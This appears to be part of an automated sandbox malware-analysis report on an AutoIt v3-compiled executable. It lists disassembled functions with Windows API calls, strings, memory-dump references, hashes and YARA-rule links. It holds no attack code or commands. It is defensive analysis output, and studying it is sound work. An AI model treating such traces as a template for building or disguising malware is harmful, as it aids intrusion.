                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                                                                      • Opcode ID: c9911b33371d9f2169ab5261d226fcd4ecbfcb3a87f6e95e8c4d76e9a5c4718c
                                                                                                                                                                      • Instruction ID: b4cb289af9653abb07451d669beb4890be765bd793603a489330bcf6ad4b611e
                                                                                                                                                                      • Opcode Fuzzy Hash: c9911b33371d9f2169ab5261d226fcd4ecbfcb3a87f6e95e8c4d76e9a5c4718c
                                                                                                                                                                      • Instruction Fuzzy Hash: 63318B7184530AAFDB02EFA4DC84AD9BFF4FF09310F15856AE980E62A0D3B54585CF54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00373041, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00373074
                                                                                                                                                                      • RegisterClassExW.USER32 ref: 0037309E
                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003730AF
                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 003730CC
                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003730DC
                                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 003730F2
                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00373101
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                                                                      • Opcode ID: b79fabc7f2b835ba040e6f8302e37f53da0adde110c7cdb4f3cf9eb8404ffdc8
                                                                                                                                                                      • Instruction ID: 5e17feeaaa8d87fbce255da0147a2446306b0e18cb2c756de0a6e0842330589d
                                                                                                                                                                      • Opcode Fuzzy Hash: b79fabc7f2b835ba040e6f8302e37f53da0adde110c7cdb4f3cf9eb8404ffdc8
                                                                                                                                                                      • Instruction Fuzzy Hash: 0421C9B5901219BFDB01EF94ED89BDDBBF8FB08700F01952AFA10A62A0D7B54544CFA5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003771EB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00374864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004362F8,?,003737C0,?), ref: 00374882
                                                                                                                                                                        • Part of subcall function 0039074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,003772C5), ref: 00390771
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00377308
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003AECF1
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003AED32
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 003AED70
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003AEDC9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                      • API String ID: 2673923337-2727554177
                                                                                                                                                                      • Opcode ID: 3dbb6306d91fcbacdee4333de760ce16c7d7c7bdc85b7033ffb796888bcd0eea
                                                                                                                                                                      • Instruction ID: 2dcfbf0eb7f6effd34e2227ccbf809d3dc155c81b2aa0df2f8c00e159939463c
                                                                                                                                                                      • Opcode Fuzzy Hash: 3dbb6306d91fcbacdee4333de760ce16c7d7c7bdc85b7033ffb796888bcd0eea
                                                                                                                                                                      • Instruction Fuzzy Hash: B371A0B14083019EC726EF25EC819ABBBE8FF49340F40557EF489CB1A1DB709948CB69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00373633, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 003736D2
                                                                                                                                                                      • KillTimer.USER32(?,00000001), ref: 003736FC
                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0037371F
                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0037372A
                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 0037373E
                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0037375F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                      • String ID: TaskbarCreated$%@
                                                                                                                                                                      • API String ID: 129472671-1054899366
                                                                                                                                                                      • Opcode ID: 9fed546e67bbbe010d508a943f921dfba2799514296f23b5a6a10ea866fed466
                                                                                                                                                                      • Instruction ID: 10ab0a9425c98bdbd4f15d2e6461190451c154026f1d51dec04906a417a5f171
                                                                                                                                                                      • Opcode Fuzzy Hash: 9fed546e67bbbe010d508a943f921dfba2799514296f23b5a6a10ea866fed466
                                                                                                                                                                      • Instruction Fuzzy Hash: 474117B1100146BBDB3B7F24DC49B7A3798EB45300F16C529F90AD66A1CB6CED00E765
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00373A58, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00373A62
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00373A71
                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00373A88
                                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00373A9A
                                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00373AAC
                                                                                                                                                                      • LoadImageW.USER32 ref: 00373AD2
                                                                                                                                                                      • RegisterClassExW.USER32 ref: 00373B28
                                                                                                                                                                        • Part of subcall function 00373041: GetSysColorBrush.USER32(0000000F), ref: 00373074
                                                                                                                                                                        • Part of subcall function 00373041: RegisterClassExW.USER32 ref: 0037309E
                                                                                                                                                                        • Part of subcall function 00373041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003730AF
                                                                                                                                                                        • Part of subcall function 00373041: InitCommonControlsEx.COMCTL32(?), ref: 003730CC
                                                                                                                                                                        • Part of subcall function 00373041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003730DC
                                                                                                                                                                        • Part of subcall function 00373041: LoadIconW.USER32(000000A9), ref: 003730F2
                                                                                                                                                                        • Part of subcall function 00373041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00373101
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                                                                      • Opcode ID: 5c20445919838d4aa1d995b194664a3ed80b349b24d09ce95bb2cf131921cb39
                                                                                                                                                                      • Instruction ID: 3c5b93f49568eaba6d4968e8c790473331139f1c8955c2ee6aaaece4a7cc9b96
                                                                                                                                                                      • Opcode Fuzzy Hash: 5c20445919838d4aa1d995b194664a3ed80b349b24d09ce95bb2cf131921cb39
                                                                                                                                                                      • Instruction Fuzzy Hash: EB215E74D00309BFDB11AFA4EC49BAE7BB4FB08710F02917AF904A62A1D3BA5554DF58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00373778, Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$bC
                                                                                                                                                                      • API String ID: 1825951767-2773424469
                                                                                                                                                                      • Opcode ID: a874c37fb75dd78112b25c10ca3d596c1baeb1abeecc72aba76c15b74020beac
                                                                                                                                                                      • Instruction ID: 09212a60d07568ed663ae2d5bdb4e0be29ef2bfcf25a8ec1a6c1029a2577514e
                                                                                                                                                                      • Opcode Fuzzy Hash: a874c37fb75dd78112b25c10ca3d596c1baeb1abeecc72aba76c15b74020beac
                                                                                                                                                                      • Instruction Fuzzy Hash: 3AA1747281021DAADF26FBA0CC95EEEB778FF15300F01852AF41A6B191DF785605CB61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0037FBBD, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0037FC06
                                                                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 0037FCA5
                                                                                                                                                                      • UnregisterHotKey.USER32(?), ref: 0037FDFC
                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 003B4A00
                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 003B4A65
                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003B4A92
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                      • String ID: close all
                                                                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                                                                      • Opcode ID: 1f8c2a0137a2c38ba79735e10dd42b4cf61d8f0218a02b0dae548e90dcfb1260
                                                                                                                                                                      • Instruction ID: cba01576b6cdd449d0caf2b5bb288e6738459926c7040c4d9322304f85032e9b
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f8c2a0137a2c38ba79735e10dd42b4cf61d8f0218a02b0dae548e90dcfb1260
                                                                                                                                                                      • Instruction Fuzzy Hash: E0A13931701212CFCB2BEB14C595A69F764BF04704F1582ADEA0AAB662DB34AD16CF58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E9E38, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                      • API String ID: 0-572801152
                                                                                                                                                                      • Opcode ID: 1997e58faa676f3e413c969c1ac15f01822d45fdc1df8e7ed6f434ebffc8da47
                                                                                                                                                                      • Instruction ID: 0424bf549fc4c5bee46af654d772838931c912fb995a70d62d0bedd1530c7f77
                                                                                                                                                                      • Opcode Fuzzy Hash: 1997e58faa676f3e413c969c1ac15f01822d45fdc1df8e7ed6f434ebffc8da47
                                                                                                                                                                      • Instruction Fuzzy Hash: 95C1B371A0026A9FDF11CFA9C884BAEB7F9FF48310F15856AE905EB280D770AD45CB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0037F8CF, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003903A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003903D3
                                                                                                                                                                        • Part of subcall function 003903A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 003903DB
                                                                                                                                                                        • Part of subcall function 003903A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003903E6
                                                                                                                                                                        • Part of subcall function 003903A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003903F1
                                                                                                                                                                        • Part of subcall function 003903A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 003903F9
                                                                                                                                                                        • Part of subcall function 003903A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00390401
                                                                                                                                                                        • Part of subcall function 00386259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0037FA90), ref: 003862B4
                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0037FB2D
                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0037FBAA
                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 003B49F2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$ChangeCloseFindHandleInitializeMessageNotificationRegisterWindow
                                                                                                                                                                      • String ID: <gC$\dC$%@$cC
                                                                                                                                                                      • API String ID: 2135498668-435206677
                                                                                                                                                                      • Opcode ID: 5cc25b4fa393e1dc4720fe80c262d6fc51884b4742ba9e2ce1e18d13dc7c8b5e
                                                                                                                                                                      • Instruction ID: 84a9fae86fe1ecae45eae0f22501244fbbdff784f07ba19894d595a68e7a687b
                                                                                                                                                                      • Opcode Fuzzy Hash: 5cc25b4fa393e1dc4720fe80c262d6fc51884b4742ba9e2ce1e18d13dc7c8b5e
                                                                                                                                                                      • Instruction Fuzzy Hash: 8781ABB0D05242BEC795EF29ED416657AE9FB69308712E13ED419CB262EB394404CF6C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00374FE9, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00374EEE,?,?,00000000,00000000), ref: 00374FF9
                                                                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00374EEE,?,?,00000000,00000000), ref: 00375010
                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00374EEE,?,?,00000000,00000000,?,?,?,?,?,?,00374F8F), ref: 003ADD60
                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00374EEE,?,?,00000000,00000000,?,?,?,?,?,?,00374F8F), ref: 003ADD75
                                                                                                                                                                      • LockResource.KERNEL32(N7,?,?,00374EEE,?,?,00000000,00000000,?,?,?,?,?,?,00374F8F,00000000), ref: 003ADD88
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                      • String ID: SCRIPT$N7
                                                                                                                                                                      • API String ID: 3051347437-1520373523
                                                                                                                                                                      • Opcode ID: 9082dcd29414db96ca141ce261a47190113c89c856fe850f77d1d231f629c316
                                                                                                                                                                      • Instruction ID: df21fe2c9bd398f7b55be9f021efd02bb73af90e33d57b71eea8872d7668680c
                                                                                                                                                                      • Opcode Fuzzy Hash: 9082dcd29414db96ca141ce261a47190113c89c856fe850f77d1d231f629c316
                                                                                                                                                                      • Instruction Fuzzy Hash: 05115E75200700BFD7368B65DC58F677BBDEFC9B51F108568F80A86260DBA1E800C660
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D7368, Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 003D737F
                                                                                                                                                                        • Part of subcall function 00390FF6: std::exception::exception.LIBCMT ref: 0039102C
                                                                                                                                                                        • Part of subcall function 00390FF6: __CxxThrowException@8.LIBCMT ref: 00391041
                                                                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003D73B6
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 003D73D2
                                                                                                                                                                      • _memmove.LIBCMT ref: 003D7420
                                                                                                                                                                      • _memmove.LIBCMT ref: 003D743D
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 003D744C
                                                                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003D7461
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 003D7480
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 256516436-0
                                                                                                                                                                      • Opcode ID: 86855bc0ae5c1f6c2b86fe964a531844c58b1b8ccedb31212910046206cd555d
                                                                                                                                                                      • Instruction ID: fc4a1607c948f3bf1805e72242692c3fc10c593efba2646889e4fc49b8176c14
                                                                                                                                                                      • Opcode Fuzzy Hash: 86855bc0ae5c1f6c2b86fe964a531844c58b1b8ccedb31212910046206cd555d
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B318F36A04205EFCF12EF64DC85AAEBB78EF44710F1541B6FD04AB246DB319A10CBA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003739E7, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 00373A15
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 00373A36
                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00373A4A
                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00373A53
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                                                                      • Opcode ID: 019d8be9f6ce74c92a820f840b45c90bb9ba083bfcb6510f5998d045bc7287b5
                                                                                                                                                                      • Instruction ID: 613d7224ed9bfeb6a51320745e5dbe1b2f41540e98d9cca2915e80f04d374b1d
                                                                                                                                                                      • Opcode Fuzzy Hash: 019d8be9f6ce74c92a820f840b45c90bb9ba083bfcb6510f5998d045bc7287b5
                                                                                                                                                                      • Instruction Fuzzy Hash: 1BF03A706002957EEA312727AC08E772E7DDBC7F60F02907ABE00A2270C6A51810CAB4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D74D2, Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 003D74E5
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00381044,?,?), ref: 003D74F6
                                                                                                                                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00381044,?,?), ref: 003D7503
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00381044,?,?), ref: 003D7510
                                                                                                                                                                        • Part of subcall function 003D6ED7: CloseHandle.KERNEL32(00000000,?,003D751D,?,00381044,?,?), ref: 003D6EE1
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 003D7523
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00381044,?,?), ref: 003D752A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3495660284-0
                                                                                                                                                                      • Opcode ID: 795b7da6ba34959ebbca841e49e9add5cffb77d3ec7438f8c34aecf48db4ef05
                                                                                                                                                                      • Instruction ID: ef2fcc3d962576c6682b55b1d59f41ebc257cb36aacb52cfa1cea78ae37de78d
